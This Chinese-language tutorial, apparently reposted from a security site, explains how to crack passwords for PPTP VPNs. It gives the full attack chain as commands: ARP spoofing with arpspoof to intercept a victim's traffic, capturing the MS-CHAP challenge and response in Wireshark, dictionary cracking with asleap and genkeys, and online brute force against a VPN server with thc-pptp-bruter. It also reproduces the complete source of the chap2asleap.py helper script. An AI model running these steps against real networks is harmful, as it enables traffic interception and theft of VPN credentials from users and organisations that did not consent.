PPTP(Point to Point Tunneling Protocol),即点对点隧道协议。该协议是在PPP协议的基础上开发的一种新的增强型安全协议,支持多协议虚拟专用网(VPN),可以通过密码验证协议(PAP)、可扩展认证协议(EAP)等方法增强安全性。可以使远程用户通过拨入ISP、通过直接连接Internet或其他网络安全地访问企业网。
使用的软件是 'asleap+genkeys' 套装;这两软件看参数感觉很简单的样子,其实际使用会让人郁闷不已:
过程是:首先抓到含有用户名和密码的 **.pcap 文件包,然后用 genkeys 生成 asleap 专用的字典,再用 asleap 破解这个抓到的包就ok啦!
genkeys -r wordlist.lst -f wordlist.dat -n wordlist.idx asleap -r **.pcap -f wordlist.dat -n wordlist.idx
最后发现国外有大牛写了一个脚本用,'chap2asleap.py' ,转了过来,照着原文折腾下(原文地址:http://blog.g0tmi1k.com/2010/03/chap2asleappy-v011-vpn/)!
arpspoof -i interface -t x.x.x.x y.y.y.y arpspoof -i interface -t y.y.y.y x.x.x.x
接下来开始用wireshark抓包 (ps:发现网上“很久”以前的文章关于pptp抓包工具都是 anger 和 pptp-sniff ,最近找了半天也没有找到资源,不知为什么)
wireshark -i interface -k
目标主机登录vpn,让 wireshark 抓到包,用 'chap' 过滤下,这时我们已经可以看到明文的用户名了,然后分别复制 Challenge 和 Response 的 value 值:
使用 'chap2asleap.py' 破解密码:
python chap2asleap.py -C Challenge_value -R Response_value -x -v -d /path/to/wordlist.lst -p /path/to/asleap
-d #自定义字典文件,默认 /pentest/passwords/wordlists/darkc0de.lst
-p #指定asleap所在的文件夹,默认 /usr/bin/
thc-pptp-bruter -u username vpn服务器ip < 字典文件
cat 字典文件 | thc-pptp-bruter -u username vpn服务器ip
chap2asleap.py 脚本源码:
#!/usr/bin/python #----------------------------------------------------------------------------------------------# #chap2asleap.py v0.2 (#3 2011-04-05) # # (C)opyright 2011 - g0tmi1k # #---Important----------------------------------------------------------------------------------# # *** Do NOT use this for illegal or malicious use *** # # By running this, YOU are using this program at YOUR OWN RISK. # # This software is provided "as is", WITHOUT ANY guarantees OR warranty. # #---Modules------------------------------------------------------------------------------------# import os, re, sys, hashlib, getopt, binascii, urllib2 #---Defaults-----------------------------------------------------------------------------------# # [/path/to/the/file] Use which file wordlistPath = "/pentest/passwords/wordlists/darkc0de.lst" # [/path/to/the/folder] Where is asleap? asleapPath = "/pentest/wireless/asleap" # [True/False] Shows more info verbose = False # [True/False] Runs asleap afterwords run = False # [True/False] Use the wordlist for the attack wordlist = False #---Variables----------------------------------------------------------------------------------# version = "0.2 #3" txtUser = "" # null the value txtChal = "" # null the value txtResp = "" # null the value action = "33[32m[>]33[0m " info = "33[33m[i]33[0m " diag = "33[34m[+]33[0m " error = "33[31m[!]33[0m " #----Functions---------------------------------------------------------------------------------# def SplitList( list, chunk_size ): return "".join([list[offs:offs+chunk_size] + ":" for offs in range(0, len(list), chunk_size)]) #----------------------------------------------------------------------------------------------# def help_message(): print """(C)opyright 2011 g0tmi1k ~ http://g0tmi1k.blogspot.com Usage: python chap2asleap.py [options] Options: -u username... -- Username -c 0123456789ABCDEF... -- PPP CHAP Challenge (32 characters) -r 0123456789ABCDEF... -- PPP CHAP Response (98 characters) -x -- Runs asleap afterwards -w -- Uses "Wordlist" for the attack, instead of "genkey" (Default is genkey) -p /path/to/asleap -- Example: """ + asleapPath + """ -d /path/to/wordlist.lst -- Example: """ + wordlistPath + """ -h -- Displays this help message -v -- Verbosity mode (shows more detail) --update -- Downloads the latest version Example: python chap2asleap.py -u scott -c e3a5d0775370bda51e16219a06b0278f -r 84c4b33e00d9231645598acf91c384800000000000000000565fe2492fd5fb88edaec934c00d282c046227406c31609b00 -x -v Extra Help: Authors Page: http://www.willhackforsushi.com/Asleap.html Blog Post: http://g0tmi1k.blogspot.com/2010/03/script-chap2asleappy.html Video: http://g0tmi1k.blogspot.com/2010/03/video-cracking-vpn-asleap-thc-pptp.html""" sys.exit(0) #----------------------------------------------------------------------------------------------# def updateScript(): try: rScript = urllib2.urlopen("http://g0tmi1k.googlecode.com/svn/trunk/chap2asleap/chap2asleap.py").read() except: print error + "Error: Couldn't connect to server" print error + "Update Failed" sys.exit(1) rVersion = re.findall("version = \"\d.+\d.+\d.", rScript.lower()) if rVersion: rVersion = rVersion[0].replace("version = ","").replace("\"","") else: print error + "Couldn't detect version. Please manually update" print error + "Update Failed" sys.exit(1) if version == rVersion: print action + "Up-to-date" else: print action + "Updating..." updateFile = open("chap2asleap.py", "w") updateFile.write(rScript) updateFile.close() print action + "Update complete" sys.exit(1) #---Main---------------------------------------------------------------------------------------# print "33[36m[*]33[0m chap2asleap v" + version + " ~ Asleap Argument Generator" #----------------------------------------------------------------------------------------------# try: opts, args = getopt.getopt(sys.argv[1:], "u:c:r:vxwp:d:h?", ["user=","challenge=","response=","path=","wordlist=","help", "update"]) except getopt.GetoptError, err: # print help information and exit print str(err) # will print something like "option -a not recognized" sys.exit(0) #if len(opts) == 0: # help_message() for o, a in opts: if o in ("-u", "--user"): txtUser = a if o in ("-c", "--challenge"): txtChal = a if o in ("-r", "--response"): txtResp = a if o == "-v": verbose = True if o == "-x": run = True if o == "-w": wordlist = True if o in ("-p", "--path"): asleapPath = a if o in ("-d", "--wordlist"): wordlistPath = a if o in ("-h", "--help", "-?"): help_message() if o == "--update": updateScript() #----------------------------------------------------------------------------------------------# mainLoop = True try: while mainLoop: if txtUser == "": txtUser = raw_input("[~] Please enter the username: ") else: mainLoop = False mainLoop = True while mainLoop: if txtChal == "": txtChal = raw_input("[~] Please enter the PPP CHAP Challenge: ") txtChal = txtChal.replace(":", "") if not re.search("[0-f]", txtChal): txtChal = "" print error+"Sorry, you can't input that for the CHAP Challenge. Only 0-9 a-f." elif len(txtChal) != 32: txtChal = "" print error+"Sorry, PPP CHAP Challenge has to be 32 bytes in length." else: mainLoop = False mainLoop = True while mainLoop: if txtResp == "": txtResp = raw_input("[~] Please enter the PPP CHAP Response: ") txtResp = txtResp.replace(":", "") if not re.search("[0-f]", txtResp): print error+"Sorry, you can't input that for the CHAP Response. Only 0-9 a-f." txtResp = "" elif len(txtResp) != 98: print error+"Sorry, PPP CHAP Response has to be 32 bytes in length." txtResp = "" else: mainLoop = False if asleapPath[-1:] == "/": asleapPath = asleapPath[0:-1] #----------------------------------------------------------------------------------------------# if verbose == True: print info + " Username: " + txtUser if verbose == True: print info + "CHAP Challenge: " + txtChal if verbose == True: print info + " CHAP Response: " + txtResp #----------------------------------------------------------------------------------------------# authChallenge = binascii.unhexlify(txtChal) peerChallenge = binascii.unhexlify((txtResp)[0:32]) response = txtResp[48:96] challenge = ((hashlib.sha1( peerChallenge + authChallenge + txtUser )).hexdigest())[0:16] if verbose == True: print info + "Auth Challenge: " + txtChal if verbose == True: print info + "Peer Challenge: " + (txtResp)[0:32] if verbose == True: print info + " Peer Response: " + response if verbose == True: print info + " Challenge: " + challenge challenge = (SplitList (challenge,2 ))[0:-1] response = (SplitList (response,2 ))[0:-1] #----------------------------------------------------------------------------------------------# print action+"Result:" print "cd " + asleapPath if wordlist == False: print "./genkey -r " + wordlistPath + " -f words.dat -n words.idx" print "./asleap -C " + challenge + " -R " + response + " -f words.dat -n words.idx" else: print "./asleap -C " + challenge + " -R " + response + " -W " + wordlistPath #----------------------------------------------------------------------------------------------# if (os.path.isfile(asleapPath + "/genkeys") and run == True): if wordlist == False: os.system (asleapPath + "/genkeys -r " + wordlistPath + " -f /tmp/words.dat -n /tmp/words.idx") os.system (asleapPath + "/asleap -C " + challenge + " -R " + response + " -f /tmp/words.dat -n /tmp/words.idx") os.remove ("/tmp/words.dat") os.remove ("/tmp/words.idx") if wordlist == True: os.system (asleapPath + "/asleap -C " + challenge + " -R " + response + " -W " + wordlistPath) elif run == True: print "alseap isn't located: " + asleapPath #----------------------------------------------------------------------------------------------# print "33[36m[*]33[0m Done! =)" #----------------------------------------------------------------------------------------------# except KeyboardInterrupt: print "" sys.exit(0)
【原文 破解'pptp'加密类型的VPN 作者:xiao106347 安全脉搏Expl0r3r 整理发布】